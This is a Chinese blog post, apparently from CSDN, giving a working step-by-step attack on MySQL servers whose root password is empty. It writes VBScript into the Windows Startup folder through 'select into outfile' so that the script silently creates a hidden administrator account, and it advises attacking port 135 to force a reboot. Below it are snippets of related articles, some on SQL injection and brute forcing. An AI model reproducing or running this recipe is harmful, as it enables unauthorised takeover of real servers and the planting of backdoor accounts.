MYSQL用户root密码为空又一攻击方法

最新推荐文章于 2024-01-21 03:38:35 发布
原创 最新推荐文章于 2024-01-21 03:38:35 发布 · 1.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql #数据库 #脚本 #服务器 #cmd #dos

本文介绍了利用MySQL服务器创建VBS脚本获取服务器管理员权限的方法。包括连接MySQL服务器、查看数据库和数据表、创建新表、插入内容、输出表为VBS脚本文件等步骤,还说明了使用VBS脚本的原因是可隐藏窗口且无错误提示。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前天,我发了一张关于MYSQL用户ROOT密码为空的贴,在网上我也找到一些利用此漏洞的方法,一般就是写一个ASP或PHP的后门,不仅很麻烦,而且还要猜解网站的目录,如果对方没有开IIS,那我们岂不没办法了??
后来,自己思索想到一个办法,在我测试的几台有此漏洞的机中均获得了成功,现将我的攻击方法公布如下:

1、连接到对方MYSQL 服务器
mysql -u root -h 192.168.0.1
mysql.exe 这个程序在你安装了MYSQL的的BIN目录中
2、让我们来看看服务器中有些什么数据库
mysql>show databases;
MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。
3、让我们进入数据库
mysql>use test;
我们将会进入test数据库中
4、查看我们进入数据库中有些什么数据表
mysql>show tables;
默认的情况下,test中没有任何表的存在。
以下为关键的部分
5、在TEST数据库下创建一个新的表;
mysql>create table a (cmd text);
好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。
6、在表中插入内容
mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user zjl317 zjl317 /add"",0) " );
mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators zjl317 /add"",0) " );
注意双引号和括号以及后面的“0”一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!
7、好了,现在我们来看看表a中有些什么
mysql>select * from a;
我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步
8、输出表为一个VBS的脚本文件
mysql>select * from a into outfile "c://docume~1//alluse~1//「开始」菜单//程序//启动//a.vbs";
我们把我们表中的内容输入到启动组中,是一个VBS的脚本文件!注意“/"符号。
9、看到这大家肯定知道了,就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢,因为启动运行时会有明显的DOS窗口出来,而用VBS脚本则可以完全隐藏窗口且不会有错误提示!本来,应该还有一句完成脚本后自动删除此脚本的,但是中文目录实在无法处理,只有作罢!好了,找个工具攻击135让服务器重启吧,几分钟以后你就是管理员了。




文本


原作者:lztei

MySQL 用户 root 密码的另类攻击方法
JfpBlockchain的博客
10-10 207
通过上述步骤,攻击者可以利用root用户密码的情况,创建并授予恶意用户完全的数据库访问权限。因此,在使用MySQL数据库时,务必确保root用户密码被设置为强密码,并定期更改密码,以防止此类攻击的发生。在MySQL数据库中,root用户是具有最高权限的用户,拥有对数据库的完全控制权。然而,如果root用户密码设置为,将会导致数据库系统存在巨大的安全风险。在实际环境中,只有合法授权下的管理员才能对数据库进行操作,并且应该采取适当的安全措施来保护数据库的安全性。
msf --攻击MySQL 和简单实用
代码审计
04-21 4511
msfdb run(可以自动链接数据库) hosts services use auxiliary/scanner/mysql/mysql_version set PASS_FILE /home/kali/Desktop/yui.txt set exploit 步骤 mysql 爆破 root 密码 mysql_udf 上传udf mysql_sql 将执行的语句进行hex ...
[Mysql] 防御和检查SQL注入攻击的手段
天天-工作博客
08-09 6891
SQL注入攻击的种类   知彼知己,方可取胜。首先要清楚SQL注入攻击有哪些种类。   1.没有正确过滤转义字符   在用户的输入没有为转义字符过滤时,就会发生这种形式的注入式攻击,它会被传递给个SQL语句。这样就会导致应用程序的终端用户数据库上的语句实施操
mysql攻击小技巧
Magicbreaker的专栏
07-28 2894
[tips2]文/superhei 05-02-101.不要错误判断(特殊字符)的sql注射经典方法:id=1 and 1=2 union select 1,1,1,1,1,1,1 再根据特殊字符判断我们知道当上面的字段前后样时,查询出来的字段数据都被1替换了,这里用可以把1改为个特殊点的数字(不可以为字符),比如这样:id= and 1=2 union select 1.123230273,
mysql密码攻击_MYSQL用户root密码为弱口令又攻击方法
weixin_42300162的博客
01-21 303
测试MySQL服务器root密码方法公布如下: 1、连接到对方MYSQL 服务器 mysql -u root -h 192.168.0.1 mysql.exe 这个程序在你安装了MYSQL的的BIN目录中 2、让我们来看看服务器中有些什么数据库 mysqlshow databases; MYSQL默认安装时会有MYSQL、TEST这两个数测试MySQL服务器root密码方法公布如下:1、连接到...
mysql攻击全攻略_mysql攻击小技巧
weixin_28803437的博客
02-18 402
[tips2] 文/superhei 05-02-10 1.不要错误判断(特殊字符)的sql注射 经典方法: id=1 and 1=2 union select 1,1,1,1,1,1,1 再根据特殊字符判断 我们知道当上面的字段前后样时,查询出来的字段数据都被1替换了,这里用可以把1改为个特殊点的数字(不可以为字符),比如这样: id= and 1=2 union select...
windows下重置mysqlroot密码方法介绍
12-15
这里我主要讲mysql 用户密码的重置步骤。 重置 root 密码 在忘记 root 密码的情况下,可以进入 mysql 的安全模式,重置 root 密码。 1. 停止 MySQL 服务 打开命令提示符窗口,输入 net stop mysql 关闭 MySQL ...
阿里云Linux CentOS 7.2下自建MySQLroot密码忘记的解决方法
09-09
以上步骤详细描述了在阿里云Linux CentOS 7.2环境下忘记MySQL root密码的解决方法。遵循这些步骤应该可以安全地重置密码,并恢复对数据库的正常访问。如果读者在操作过程中遇到任何问题,可以留言寻求帮助,作者会...
mysqlroot 用户无法授权及解决navicat 远程授权提示1044问题
09-08
但请注意,开放root用户的远程访问可能带来安全风险,因此建议只在必要时这样做,并确保你的MySQL服务器有强大的防火墙规则和安全策略来保护数据库免受攻击。 总之,当遇到MySQLroot用户无法授权或者Navicat远程...
mysql端口攻击_常见端口以及攻击方式
weixin_39950772的博客
02-19 827
常见端口:ftp: 默认端口:20(数据端口);21(控制端口);69(tftp小型文件传输协议)攻击方式:爆破:ftp的爆破工具有很多,这里我推荐owasp的Bruter以及msf中ftp爆破模块;nfs: 默认端口:2049攻击方式:未授权访问:未限制IP以及用户权限设置错误samba: 默认端口:137,139攻击方式:爆破:弱口令(爆破工具采用hydra)hydra -l usernam...
MySQL安全漏洞攻击方式及预防措施
vipfanxu的博客
09-05 1969
MySQL的安全漏洞攻击方式各不相同,然而,通过采取恰当的预防措施,可以提高MySQL的整体安全性。最重要的是,数据库管理员应当保持对新的安全漏洞攻击方式的关注,并及时采取措施应对。MySQL种流行的开源关系型数据库管理系统,被广泛用于网站和应用程序的后端数据存储,然而,正因为其广泛使用,也使得MySQL成为黑客和恶意攻击者的目标。缓冲区溢出是种利用软件漏洞攻击方式,黑客通过向MySQL发送超长的数据或恶意数据,导致MySQL内部的缓冲区溢出,从而可以执行恶意代码或控制数据库
渗透测试中,常用的 mysql攻击命令组合详解《用法》
qq_33993881的博客
03-27 721
这可以用于在渗透测试中查找目标系统中的关联数据或者弱点。
网络安全之MySql攻击
一位专注网络安全以及渗透的资深工程师
01-09 1637
如果在 Windows 系统下的话应该就是最高权限了,执行些 net user 增加用户的命令应该都是可以成功的现在文章思路慢慢变成了 MySQL 可操控文件怎么将这个危害扩大影响的问题了。可以往管理员桌面上写个伪造的 CS 木马,如果对方 Office 有漏洞的话可以写入个带后门的 word 文件,也可以篡改用户常执行的文件等 这样发散开来就变的很广了,国光这里不再叙述了,总之实际场景实际分析,大家在渗透的时候也可以多多思考更多的可能性,万就成功了呢。
mysql语句防止攻击_php有效防止SQL注入攻击的三种方法
weixin_33279969的博客
01-28 402
SQL注入是种代码注入技术,用通过表单域插入的恶意SQL语句来攻击Web应用程序,并且通常会提取重要的数据库信息。这是个非常关键的安全漏洞,它可以完全破坏数据库,所以最需要使用适当的代码来保护应用程序。本文章向大家介绍php有效防止SQL注入攻击的三种方法方法:使用转义字符串mysql_real_escape_string开发人员通常使用PHP函数mysql_real_escape_str...
MySQL数据库安全配置:如何防范常见的攻击
AI天才研究院
01-21 1835
1.背景介绍 1. 背景介绍 MySQL数据库安全性是在网络环境中运行MySQL数据库的关键问题之数据库安全性是确保数据完整性、机密性和可用性的过程。MySQL数据库安全性涉及到数据库系统的安全性、数据安全性和系统安全性等方面。 MySQL数据库安全性的主要问题是数据库攻击数据库攻击是指通过网络或其他途径对MySQL数据库进行非法访问、篡改、披露或损坏等行为。数据库攻击可能导致数据丢失...
为啥mysql老是被攻击_如何防止入侵:MySQL各种攻击方法大全_PHP教程
weixin_28816215的博客
02-11 1318
MYSQL用户ROOT密码时是个很大的漏洞,在网上也有许多些利用此漏洞方法般就是写个ASP或PHP的后门,不仅很麻烦,而且还要猜解网站的目录,如果对方没有开IIS,那我们岂不没办法了??后来,自己思索想到个办法,且在测试的几台有此漏洞的机中均获得了成功,现将攻击方法公布如下:1、连接到对方MYSQL 服务器mysql -u root -h 192.168.0.1mysql.exe...
mysql 5.0 入侵_mysql5.0入侵测试以及防范方法分享
weixin_35182280的博客
02-17 189
在做了之前的SQL SERVER之后,便很想尝试MYSQL的入侵测试已经防范,与大家起分享。总的来说,我直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。本馒头引发的血案。。。正题之物理机:Win7虚拟机:XP给予mysql远程权限:代码如下:grant all privileges on *.* to...
mysql 服务器攻击_攻击MySQL服务器传播GandCrab勒索软件
weixin_30578645的博客
01-19 406
研究人员在实验室环境中搭建了个蜜罐系统,监听着SQL服务器使用的默认端口(TCP/3306端口)。该蜜罐系统发现来自美国机器的攻击。研究人员监控了僵尸网络生成的网络流量和行为,发现该 Linux 蜜罐下载了个Windows可执行文件。 攻击者首先用SQL数据库命令在上传helper DLL到服务器,然后作为 数据库 函数调用该DLL来提取IP地址位于加拿大魁北克省的主机上的GandCrab p...
常见的基本漏洞以及些防范方法
m0_63081418的博客
08-14 737
个人总结的些基本漏洞的类型,大佬勿喷
mysql表中密码匹配,但是select结果为
最新发布
03-21
### MySQL 查询中密码匹配但结果为的原因分析 在 MySQL 中执行 `SELECT` 查询时,如果密码匹配却返回结果,可能涉及多个方面的问题。以下是可能导致此现象的主要原因及其解决方案: #### 1. **MySQL 版本差异** 自 MySQL 8.0 起,`PASSWORD()` 函数已被废弃[^3]。这意味着如果你尝试通过该函数验证密码,则可能会导致不致的结果。例如,在旧版 MySQL 中可以正常工作的查询逻辑,在新版中会失效。 解决方法: 应改用更现代的方式存储和校验密码。可以通过 `ALTER USER` 或者直接更新 `mysql.user` 表来实现密码管理操作[^2]。 #### 2. **用户权限配置错误** 即使输入的用户名和密码正确无误,但如果用户的访问权限未被正确定义或者受限于特定主机地址(如 `'user'@'localhost'`),那么即便认证成功也可能无法检索到预期数据[^4]。 检查命令如下所示: ```sql SHOW GRANTS FOR 'your_user_name'@'host'; ``` 必要时重新授予适当权限给目标账户: ```sql GRANT ALL PRIVILEGES ON *.* TO 'username'@'%' IDENTIFIED BY 'password' WITH GRANT OPTION; FLUSH PRIVILEGES; ``` #### 3. **SQL 注入防护机制的影响** 某些情况下,为了防止 SQL 注入攻击,默认安全策略会对敏感字段施加额外约束条件。这或许解释了为何尽管提供了合法凭证仍得不到任何记录反馈的现象[^5]。 建议做法是在设计应用程序接口时遵循最佳实践原则——始终采用参数化查询而非拼接字符串方式构建动态 SQL 句子;另外还可以考虑启用二进制日志功能以便追踪异常行为的发生过程。 --- ### 示例代码片段展示如何正确处理此类场景下的身份验证流程 假设我们有个简单的表结构用于保存注册过的账号信息: | id | username | password_hash | |--|--|--| | 1 | admin | $argon2id$v=19$m=6...| 下面给出段 Python 程序演示怎样利用 Argon2 加密算法完成登录检验工作而不会遇到上述提到的各种麻烦事. ```python import pymysql from argon2 import PasswordHasher def authenticate(username, provided_password): connection = pymysql.connect(host='localhost', user='root', passwd='', # Replace with actual root passsword. db='test_db') cursor = connection.cursor() query = """SELECT password_hash FROM users WHERE username=%s""" try: cursor.execute(query,(username,)) result_set = cursor.fetchone() if not result_set or len(result_set)==0 : return False stored_password_hash=result_set[0] ph = PasswordHasher() is_validated=False try: is_validated=ph.verify(stored_password_hash ,provided_password ) except Exception as e: print(e) finally: del(ph) return is_validated finally: connection.close() if __name__ == '__main__': res=authenticate('admin','correcthorsebatterystaple') print(res) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值